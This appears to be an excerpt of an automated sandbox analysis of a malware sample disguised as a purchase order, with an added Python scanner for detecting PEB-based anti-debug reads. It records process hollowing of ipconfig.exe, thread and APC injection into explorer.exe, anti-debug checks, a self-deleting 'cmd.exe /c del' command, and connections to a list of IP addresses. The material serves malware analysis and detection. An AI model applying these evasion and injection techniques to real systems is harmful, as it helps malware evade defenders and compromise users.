Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h] 5_2_02E79080
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h] 5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h] 5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h] 5_2_02F32073
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h] 5_2_02F41074
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h] 5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h] 5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h] 5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h] 5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h] 5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h] 5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h] 5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h] 5_2_02F041E8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h] 5_2_02EF69A6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h] 5_2_02E9C182
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h] 5_2_02EAA185
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h] 5_2_02EA2990
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h] 5_2_02E7C962
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h] 5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h] 5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h] 5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h] 5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h] 5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h] 5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h] 5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h] 5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h] 5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h] 5_2_02EA16E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h] 5_2_02E876E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h] 5_2_02F48ED6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h] 5_2_02EA36CC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h] 5_2_02EB8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h] 5_2_02F2FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h] 5_2_02EF46A7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h] 5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h] 5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h] 5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h] 5_2_02F0FE87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h] 5_2_02E8766D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h] 5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h] 5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h] 5_2_02E7E620
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h] 5_2_02F2FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h] 5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h] 5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h] 5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h] 5_2_02EA8E00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h] 5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h] 5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h] 5_2_02F31608
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h] 5_2_02EB37F5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h] 5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h] 5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h] 5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h] 5_2_02E88794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h] 5_2_02E8FF60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h] 5_2_02F48F6A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h] 5_2_02E8EF40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h] 5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h] 5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h] 5_2_02EAE730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h] 5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h] 5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h] 5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h] 5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h] 5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h] 5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h] 5_2_02E9F716
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h] 5_2_02F314FB
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h] 5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h] 5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h] 5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h] 5_2_02F48CD6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h] 5_2_02E8849B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h] 5_2_02E9746D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h] 5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h] 5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h] 5_2_02EAA44B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h] 5_2_02EABC2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h] 5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h] 5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h] 5_2_02EF6C0A
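The `fs:[00000030h]` loads listed above read the PEB pointer out of the 32-bit TEB (both processes run under WOW64, which is why the hollowed host is the SysWOW64 ipconfig.exe). On its own the instruction says nothing about intent: the CRT, the loader and any hand-rolled GetProcAddress use it. What makes it an anti-debug or API-resolution indicator is the PEB field read next: BeingDebugged at offset 2, NtGlobalFlag at offset 0x68 (the heap debug flags FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS = 0x70), or Ldr at offset 0xC when code walks the loaded-module list to resolve imports by hash. One check worth making before reading the ipconfig.exe entries as separate findings: every ipconfig.exe function address is the corresponding sample address plus a constant 0x01EF0000 (1_2_00F976E2 and 5_2_02E876E2, 1_2_01006CF0 and 5_2_02EF6CF0, 1_2_010414FB and 5_2_02F314FB), i.e. the same injected code mapped at a different base, not anything ipconfig.exe does itself.

The following is an added triage example, not code from the report or from the sandbox vendor. It finds both common encodings of the PEB read in raw x86 code and uses a short heuristic look-ahead to name the PEB field touched next. The byte string is constructed for the demonstration, and the look-ahead decodes only the simple `[reg+disp8]` operand forms that such checks usually compile to; it is an assumption about typical code shape, not a disassembler.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Two common encodings of "mov r32, dword ptr fs:[30h]":
#   64 A1 30 00 00 00        mov eax, fs:[moffs32]   (eax only)
#   64 8B /r 30 00 00 00     mov r32, fs:[disp32]    ModRM mod=00 rm=101, reg=r32
PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00"
)
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB fields typically consulted right after the PEB load.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}

# Opcodes with a ModRM memory operand that appear in the follow-up access:
# mov r8/r32 (8A/8B), cmp/test r/m8,imm8 (80/F6), cmp r,r/m (3A/3B), movzx (0F B6/B7).
ONE_BYTE_OPS = {0x8A, 0x8B, 0x80, 0xF6, 0x3A, 0x3B}


@dataclass(frozen=True)
class PebRead:
    offset: int     # offset of the fs:[30h] load in the buffer
    register: str   # register that receives the PEB pointer
    field: str      # PEB field touched next, or "unknown"


def _field_after(code: bytes, pos: int, base_reg: int, window: int) -> str:
    """Heuristic: look `window` bytes ahead for a [base_reg + disp8] operand
    (ModRM mod=01) whose displacement is a known PEB field."""
    if base_reg == 4:                     # esp base needs a SIB byte; not decoded here
        return "unknown"
    for i in range(pos, min(len(code) - 2, pos + window)):
        if code[i] == 0x0F and code[i + 1] in (0xB6, 0xB7):
            j = i + 2                     # movzx: ModRM follows the two-byte opcode
        elif code[i] in ONE_BYTE_OPS:
            j = i + 1
        else:
            continue
        if j + 1 >= len(code):
            break
        modrm = code[j]
        if (modrm >> 6) == 1 and (modrm & 7) == base_reg:
            disp8 = code[j + 1]
            if disp8 in PEB_FIELDS:
                return PEB_FIELDS[disp8]
    return "unknown"


def find_peb_reads(code: bytes, window: int = 12) -> list[PebRead]:
    """Locate every fs:[30h] load and classify what the code does with it."""
    hits = []
    for m in PEB_READ.finditer(code):
        modrm = m.group("modrm")
        reg = 0 if modrm is None else (modrm[0] >> 3) & 7   # A1 form is always eax
        hits.append(PebRead(m.start(), REGS[reg], _field_after(code, m.end(), reg, window)))
    return hits


def summarize(code: bytes) -> dict[str, int]:
    """Count PEB reads by the field they lead to: the triage-level answer to
    'why does this code read the PEB?'."""
    counts: dict[str, int] = {}
    for hit in find_peb_reads(code):
        counts[hit.field] = counts.get(hit.field, 0) + 1
    return counts


# Constructed fragment (not bytes from the analysed sample) showing the three
# follow-ups the scanner recognises after a PEB load.
SAMPLE_CODE = bytes.fromhex(
    "90 90 "                   # nop; nop
    "64 A1 30 00 00 00 "       # mov eax, fs:[30h]
    "80 78 02 00 "             # cmp byte ptr [eax+2], 0   ; PEB.BeingDebugged
    "75 05 "                   # jne +5
    "64 8B 0D 30 00 00 00 "    # mov ecx, fs:[30h]
    "8B 41 68 "                # mov eax, [ecx+68h]        ; PEB.NtGlobalFlag
    "A9 70 00 00 00 "          # test eax, 70h
    "64 8B 35 30 00 00 00 "    # mov esi, fs:[30h]
    "8B 46 0C "                # mov eax, [esi+0Ch]        ; PEB.Ldr (module walk)
    "C3"                       # ret
)

if __name__ == "__main__":
    for hit in find_peb_reads(SAMPLE_CODE):
        print(f"+0x{hit.offset:04x}  mov {hit.register}, fs:[30h]  ->  {hit.field}")
    print(summarize(SAMPLE_CODE))
```

Run it over the unpacked .text section of the sample (or over the injected region dumped from ipconfig.exe) rather than the packed file; the packer's own stub will add a few "unknown" hits, and a read whose follow-up is more than twelve bytes away or goes through a SIB-encoded operand is also reported as "unknown" rather than guessed.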
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013ED6DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_013ED6DE
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E605C SetUnhandledExceptionFilter, 0_2_013E605C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013E032D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_013DD3A1

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe Network Connect: 194.35.122.226 80
Source: C:\Windows\explorer.exe Network Connect: 185.201.11.126 80
Source: C:\Windows\explorer.exe Network Connect: 3.134.22.63 80
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Network Connect: 103.224.182.242 80
Source: C:\Windows\explorer.exe Network Connect: 104.253.79.71 80
Source: C:\Windows\explorer.exe Network Connect: 52.71.133.130 80
Source: C:\Windows\explorer.exe Network Connect: 3.12.202.18 80
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe Network Connect: 154.86.218.70 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 13.226.173.80 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3292
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoA, 0_2_013EC95A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_013E81CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_013E883F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_013E8B37
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_013EC321
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 0_2_013E8B73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_013E8A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 0_2_013E5A51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 0_2_013EC247
